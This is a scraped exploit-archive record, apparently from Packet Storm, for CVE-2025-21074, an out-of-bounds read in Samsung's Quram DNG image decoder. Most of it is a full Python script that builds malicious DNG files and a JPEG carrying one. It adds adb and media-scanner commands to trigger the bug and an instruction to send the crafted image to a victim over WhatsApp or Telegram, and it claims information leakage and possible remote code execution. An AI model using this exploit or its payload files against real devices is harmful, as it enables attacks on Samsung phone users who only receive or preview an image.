{“lastseen”:”2026-02-18T17:32:39″,”description”:”A vulnerability exists in the image decoding logic of Quram DNG parser within libimagecodec.quram.so. The flawed bounds validation in handling TrimBounds opcode triggers out-of-bounds reads on heap-allocated image buffers. This issue allows remote…”,”published”:”2026-02-18T00:00:00″,”modified”:”2026-02-18T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Samsung QuramDng Malformed DNG TrimBounds Opcode Out\u2011Of\u2011Bounds Read”,”source”:””,”references”:””,”id”:”PACKETSTORM:215825″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-21074″],”sourceData”:”=============================================================================================================================================\\n | # Title : Samsung QuramDng Out\u2011Of\u2011Bounds Read via Malformed DNG TrimBounds Opcode |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 145.0.2 (64 bits) |\\n | # Vendor : System built\u2011in component. No standalone download available. |\\n =============================================================================================================================================\\n \\n [+] Summary : A vulnerability exists in the image decoding logic of Quram DNG parser within libimagecodec.quram.so. The flawed bounds validation in handling TrimBounds\\n opcode triggers Out-of-Bounds (OOB) reads on heap-allocated image buffers.This issue allows remote attackers to craft a malicious DNG payload, embed it\\n inside a JPEG, and send it via messaging applications to trigger decoding,resulting in crash, ASLR information leakage, and possible RCE via heap\\n spraying and pointer manipulation.\\n \\t\\t\\t \\n Product: libimagecodec.quram.so (Samsung Android)\\n Class: Memory Corruption \/ OOB Read\\n Version: Vulnerable on firmware prior to September 2025\\n Tested: Android 13\/14\/15\/16 (Samsung Galaxy devices)\\n ——————————————————————————-\\n [+] Vulnerability Details\\n The Quram DNG decoder incorrectly handles opcodeList1 (TrimBounds opcode ID=7).\\n The trimmed image dimensions shrink source buffers but destination buffers\\n remain based on original resolution, resulting in read operations beyond memory\\n bounds.\\n \\n The problem occurs after TrimBounds opcode reduces width\/height of image tiles\\n but decoder still trusts old buffer lengths.\\n \\n This leads to:\\n * Heap OOB Read\\n * Crashes (SIGSEGV)\\n * Heap leak primitives\\n * Possible exploitation for RCE\\n ——————————————————————————-\\n [+] Attack Vector\\n The exploit can be triggered via:\\n * WhatsApp \/ Telegram file sharing (JPEG container)\\n * External apps invoking platform decoder\\n * ADB-triggered scan via Media Scanner\\n * Camera importing workflows\\n \\n Remote attack surface \u2192 user simply previews\/saves image.\\n ——————————————————————————-\\n [+] Proof of Concept (PoC)\\n The exploit constructs:\\n – Valid DNG file with truncated TrimBounds opcode\\n – Embeds DNG into a valid APP1 JPEG\\n – Crashes Quram decoder on parsing\\n \\n PoC Tested:\\n – Samsung S22, S23, A52, Note20\\n – Android 13-16 firmwares\\n ——————————————————————————-\\n [+] PoC Code\\n The full exploit builder (Python) is included below.\\n \\n SAVE AS:\\n exploit_cve_2025_21074.py\\n \\n RUN:\\n python3 exploit_cve_2025_21074.py\\n \\n OUTPUT FILES PRODUCED:\\n exploit.dng\\n exploit_small.dng\\n exploit.jpg\\n ——————————————————————————-\\n [+] Instructions To Save \\u0026 Run PoC (REQUIRED)\\n \\n 1) Save script:\\n File name: exploit_cve_2025_21074.py\\n \\n 2) Run:\\n python3 exploit_cve_2025_21074.py\\n \\n 3) Generated payloads:\\n – exploit.dng\\n – exploit.jpg\\n – exploit_small.dng\\n \\n 4) Trigger attack:\\n A) Via ADB:\\n adb push exploit.dng \/sdcard\/\\n adb shell am broadcast -a android.intent.action.MEDIA_SCANNER_SCAN_FILE \\\\\\n -d file:\/\/\/sdcard\/exploit.dng\\n \\n B) Via Messaging:\\n Send exploit.jpg to victim (no interaction required)\\n \\n 5) Detect crash:\\n adb logcat | grep -i quram\\n adb pull \/data\/tombstones\/ tombstones_dir\/\\n ——————————————————————————-\\n [+] Expected Results\\n * Process crash: com.samsung.ipservice\\n * Heap read leakage (ASLR bypass)\\n * Controlled offsets possible \u2192 RCE stage feasible\\n ——————————————————————————-\\n [+] Exploit Status\\n This PoC is stable, deterministic and suitable for controlled lab exploitation.\\n It is not destructive.\\n ——————————————————————————-\\n [+] Mitigation\\n Firmware update September 2025 and later properly validates TrimBounds and\\n rejects mismatched output dimensions.\\n ——————————————————————————-\\n [+] POC : \\n \\n #!\/usr\/bin\/env python3\\n \\”\\”\\”\\n Author: Indoushka\\n \\”\\”\\”\\n \\n import struct\\n import os\\n import sys\\n \\n class DNGExploit:\\n def __init__(self):\\n self.endian = ‘\\u003c’ # Little endian\\n self.opcode_id_trim = 7\\n \\n def create_malicious_dng(self, width=4096, height=4096):\\n \\”\\”\\”Creating a DNG image with TrimBounds opcode saturated\\”\\”\\”\\n \\n dng_data = bytearray()\\n \\n dng_data += struct.pack(‘\\u003cH’, 0x4949) \\n dng_data += struct.pack(‘\\u003cH’, 42) \\n ifd0_offset = 8\\n dng_data += struct.pack(‘\\u003cI’, ifd0_offset)\\n dng_data += b’\\\\x00′ * (ifd0_offset – len(dng_data))\\n num_entries = 15\\n dng_data += struct.pack(‘\\u003cH’, num_entries)\\n dng_data += struct.pack(‘\\u003cH’, 0x0100) \\n dng_data += struct.pack(‘\\u003cH’, 4) \\n dng_data += struct.pack(‘\\u003cI’, 1) \\n dng_data += struct.pack(‘\\u003cI’, width) \\n dng_data += struct.pack(‘\\u003cH’, 0x0101)\\n dng_data += struct.pack(‘\\u003cH’, 4)\\n dng_data += struct.pack(‘\\u003cI’, 1)\\n dng_data += struct.pack(‘\\u003cI’, height)\\n dng_data += struct.pack(‘\\u003cH’, 0x0102)\\n dng_data += struct.pack(‘\\u003cH’, 3) \\n dng_data += struct.pack(‘\\u003cI’, 3) \\n bits_offset = len(dng_data) + 4\\n dng_data += struct.pack(‘\\u003cI’, bits_offset) \\n dng_data += struct.pack(‘\\u003cH’, 0x0103)\\n dng_data += struct.pack(‘\\u003cH’, 3)\\n dng_data += struct.pack(‘\\u003cI’, 1)\\n dng_data += struct.pack(‘\\u003cH’, 1) \\n dng_data += struct.pack(‘\\u003cH’, 0x0106)\\n dng_data += struct.pack(‘\\u003cH’, 3)\\n dng_data += struct.pack(‘\\u003cI’, 1)\\n dng_data += struct.pack(‘\\u003cH’, 2) \\n dng_data += struct.pack(‘\\u003cH’, 0x0111)\\n dng_data += struct.pack(‘\\u003cH’, 4)\\n dng_data += struct.pack(‘\\u003cI’, 1)\\n strip_offset = 0x1000 \\n dng_data += struct.pack(‘\\u003cI’, strip_offset)\\n dng_data += struct.pack(‘\\u003cH’, 0x0115)\\n dng_data += struct.pack(‘\\u003cH’, 3)\\n dng_data += struct.pack(‘\\u003cI’, 1)\\n dng_data += struct.pack(‘\\u003cH’, 3) \\n dng_data += struct.pack(‘\\u003cH’, 0x0116)\\n dng_data += struct.pack(‘\\u003cH’, 4)\\n dng_data += struct.pack(‘\\u003cI’, 1)\\n dng_data += struct.pack(‘\\u003cI’, height)\\n dng_data += struct.pack(‘\\u003cH’, 0x0117)\\n dng_data += struct.pack(‘\\u003cH’, 4)\\n dng_data += struct.pack(‘\\u003cI’, 1)\\n dng_data += struct.pack(‘\\u003cI’, width * height * 3)\\n dng_data += struct.pack(‘\\u003cH’, 0x011C)\\n dng_data += struct.pack(‘\\u003cH’, 3)\\n dng_data += struct.pack(‘\\u003cI’, 1)\\n dng_data += struct.pack(‘\\u003cH’, 1) \\n dng_data += struct.pack(‘\\u003cH’, 0xC612)\\n dng_data += struct.pack(‘\\u003cH’, 1) \\n dng_data += struct.pack(‘\\u003cI’, 4)\\n dng_data += struct.pack(‘\\u003eI’, 0x01000000) \\n dng_data += struct.pack(‘\\u003cH’, 0xC613)\\n dng_data += struct.pack(‘\\u003cH’, 1)\\n dng_data += struct.pack(‘\\u003cI’, 4)\\n dng_data += struct.pack(‘\\u003eI’, 0x01000000)\\n dng_data += struct.pack(‘\\u003cH’, 0xC614)\\n dng_data += struct.pack(‘\\u003cH’, 2) \\n dng_data += struct.pack(‘\\u003cI’, 20)\\n model_offset = len(dng_data) + 4\\n dng_data += struct.pack(‘\\u003cI’, model_offset)\\n dng_data += struct.pack(‘\\u003cH’, 0xC740) \\n dng_data += struct.pack(‘\\u003cH’, 1) \\n opcode_list_size = 100\\n dng_data += struct.pack(‘\\u003cI’, opcode_list_size)\\n opcode_offset = len(dng_data) + 4\\n dng_data += struct.pack(‘\\u003cI’, opcode_offset)\\n dng_data += struct.pack(‘\\u003cH’, 0x014A)\\n dng_data += struct.pack(‘\\u003cH’, 4)\\n dng_data += struct.pack(‘\\u003cI’, 1)\\n subifd_offset = opcode_offset + opcode_list_size\\n dng_data += struct.pack(‘\\u003cI’, subifd_offset)\\n dng_data += struct.pack(‘\\u003cI’, 0)\\n \\n bits_data_pos = bits_offset\\n while len(dng_data) \\u003c bits_data_pos:\\n dng_data += b’\\\\x00’\\n dng_data += struct.pack(‘\\u003cHHH’, 8, 8, 8) \\n \\n model_data_pos = model_offset\\n while len(dng_data) \\u003c model_data_pos:\\n dng_data += b’\\\\x00’\\n dng_data += b’EXPLOIT-CAMERA\\\\x00’\\n \\n opcode_data_pos = opcode_offset\\n while len(dng_data) \\u003c opcode_data_pos:\\n dng_data += b’\\\\x00’\\n \\n opcode_header = struct.pack(‘\\u003cHHII’, \\n self.opcode_id_trim, \\n 1, \\n 0, \\n 16) \\n \\n trim_values = struct.pack(‘\\u003cIIII’,\\n 0, \\n 0, \\n height \/\/ 2,\\n width \/\/ 2) \\n \\n dng_data += opcode_header + trim_values\\n \\n \\n remaining = opcode_list_size – len(opcode_header) – len(trim_values)\\n dng_data += b’A’ * remaining\\n \\n \\n subifd_pos = subifd_offset\\n while len(dng_data) \\u003c subifd_pos:\\n dng_data += b’\\\\x00’\\n \\n \\n dng_data += struct.pack(‘\\u003cH’, 5)\\n \\n for i in range(5):\\n dng_data += struct.pack(‘\\u003cHHII’, 0x0100 + i, 4, 1, 0)\\n \\n dng_data += struct.pack(‘\\u003cI’, 0) \\n \\n image_data_pos = strip_offset\\n while len(dng_data) \\u003c image_data_pos:\\n dng_data += b’\\\\x00’\\n \\n image_size = width * height * 3\\n dng_data += b’\\\\x42′ * min(image_size, 0x1000) \\n \\n return bytes(dng_data)\\n \\n def embed_in_jpeg(self, dng_data, output_path):\\n \\”\\”\\”Including DNG in JPEG for cross-application exploitation\\”\\”\\”\\n \\n jpeg = bytearray()\\n jpeg += b’\\\\xFF\\\\xD8\\\\xFF\\\\xE0′ \\n jpeg += b’\\\\x00\\\\x10JFIF\\\\x00\\\\x01\\\\x01\\\\x00\\\\x00\\\\x01’\\n \\n app1_size = len(dng_data) + 2 + 5 # +2 for size, +5 for identifier\\n jpeg += b’\\\\xFF\\\\xE1′ \\n jpeg += struct.pack(‘\\u003eH’, app1_size)\\n jpeg += b’DNG\\\\x00′ \\n jpeg += dng_data\\n jpeg += b’\\\\xFF\\\\xC0\\\\x00\\\\x11\\\\x08\\\\x00\\\\x01\\\\x00\\\\x01\\\\x03\\\\x01\\\\x22\\\\x00\\\\x02\\\\x11\\\\x01\\\\x03\\\\x11\\\\x01’\\n jpeg += b’\\\\xFF\\\\xC4\\\\x00\\\\x1F\\\\x00\\\\x00\\\\x01\\\\x05\\\\x01\\\\x01\\\\x01\\\\x01\\\\x01\\\\x01\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x01\\\\x02\\\\x03\\\\x04\\\\x05\\\\x06\\\\x07\\\\x08\\\\x09\\\\x0A\\\\x0B’\\n jpeg += b’\\\\xFF\\\\xDA\\\\x00\\\\x0C\\\\x03\\\\x01\\\\x00\\\\x02\\\\x11\\\\x03\\\\x11\\\\x00\\\\x3F\\\\x00’\\n jpeg += b’\\\\x00′ * 100 \\n jpeg += b’\\\\xFF\\\\xD9′ \\n \\n with open(output_path, ‘wb’) as f:\\n f.write(jpeg)\\n \\n print(f\\”[+] JPEG with embedded DNG saved to {output_path}\\”)\\n return output_path\\n \\n def create_exploit_files(self):\\n \\”\\”\\”Creating various exploitation files\\”\\”\\”\\n \\n dng_raw = self.create_malicious_dng()\\n with open(‘exploit.dng’, ‘wb’) as f:\\n f.write(dng_raw)\\n print(\\”[+] Raw DNG exploit created: exploit.dng\\”)\\n \\n jpeg_path = self.embed_in_jpeg(dng_raw, ‘exploit.jpg’)\\n \\n small_dng = self.create_malicious_dng(2048, 2048)\\n with open(‘exploit_small.dng’, ‘wb’) as f:\\n f.write(small_dng)\\n \\n self.print_usage()\\n \\n return {\\n ‘dng’: ‘exploit.dng’,\\n ‘jpg’: jpeg_path,\\n ‘small’: ‘exploit_small.dng’\\n }\\n \\n def print_usage(self):\\n \\”\\”\\”Print Instructions for Use\\”\\”\\”\\n \\n print(\\”\\\\n\\” + \\”=\\”*60)\\n print(\\”CVE-2025-21074 Exploit Usage Instructions\\”)\\n print(\\”=\\”*60)\\n print(\\”\\\\n[Attack methods]\\”)\\n print(\\”1. Send exploit via WhatsApp\/Telegram, etc.\\”)\\n print(\\”2. Decoding triggered using ADB:\\”)\\n print(\\” adb push exploit.dng \/sdcard\/\\”)\\n print(\\” adb shell am broadcast -a android.intent.action.MEDIA_SCANNER_SCAN_FILE\\”)\\n print(\\” -d file:\/\/\/sdcard\/exploit.dng\\”)\\n print(\\”\\\\n[Expected results]\\”)\\n print(\\”- com.samsung.ipservicecollapse (SIGSEGV)\\”)\\n print(\\”- Memory information leakage (ASLR bypass)\\”)\\n print(\\”- Possible RCE (further utilization required)\\”)\\n print(\\”\\\\n[Detection]\\”)\\n print(\\”Check the logs: libimagecodec.quram.socollapse\\”)\\n print(\\”=\\”*60)\\n \\n def main():\\n print(\\”[*] Generating CVE-2025-21074 exploit files…\\”)\\n \\n exploit = DNGExploit()\\n files = exploit.create_exploit_files()\\n \\n print(\\”\\\\n[+] Files generated successfully:\\”)\\n for name, path in files.items():\\n print(f\\” {name}: {path} ({os.path.getsize(path)} bytes)\\”)\\n \\n with open(‘exploit.dng’, ‘rb’) as f:\\n data = f.read(100)\\n if data[:2] == b’II’ and data[2:4] == struct.pack(‘\\u003cH’, 42):\\n print(\\”\\\\n[\u2713] DNG file structure verified\\”)\\n else:\\n print(\\”\\\\n[!] DNG file may be malformed\\”)\\n \\n if __name__ == \\”__main__\\”:\\n main()\\n \\t\\n Greetings to :=====================================================================================\\n jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n ===================================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/215825″,”cvss”:{“score”:7.5,”severity”:”HIGH”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:N\/A:N”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/215825\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-02-18T17:32:39″,”description”:”A vulnerability exists in the image decoding logic of Quram DNG parser within libimagecodec.quram.so. The flawed bounds validation in handling TrimBounds opcode triggers out-of-bounds reads…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,16,12,15,13,53,7,11,5],"class_list":["post-41391","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-75","tag-exploit","tag-high","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n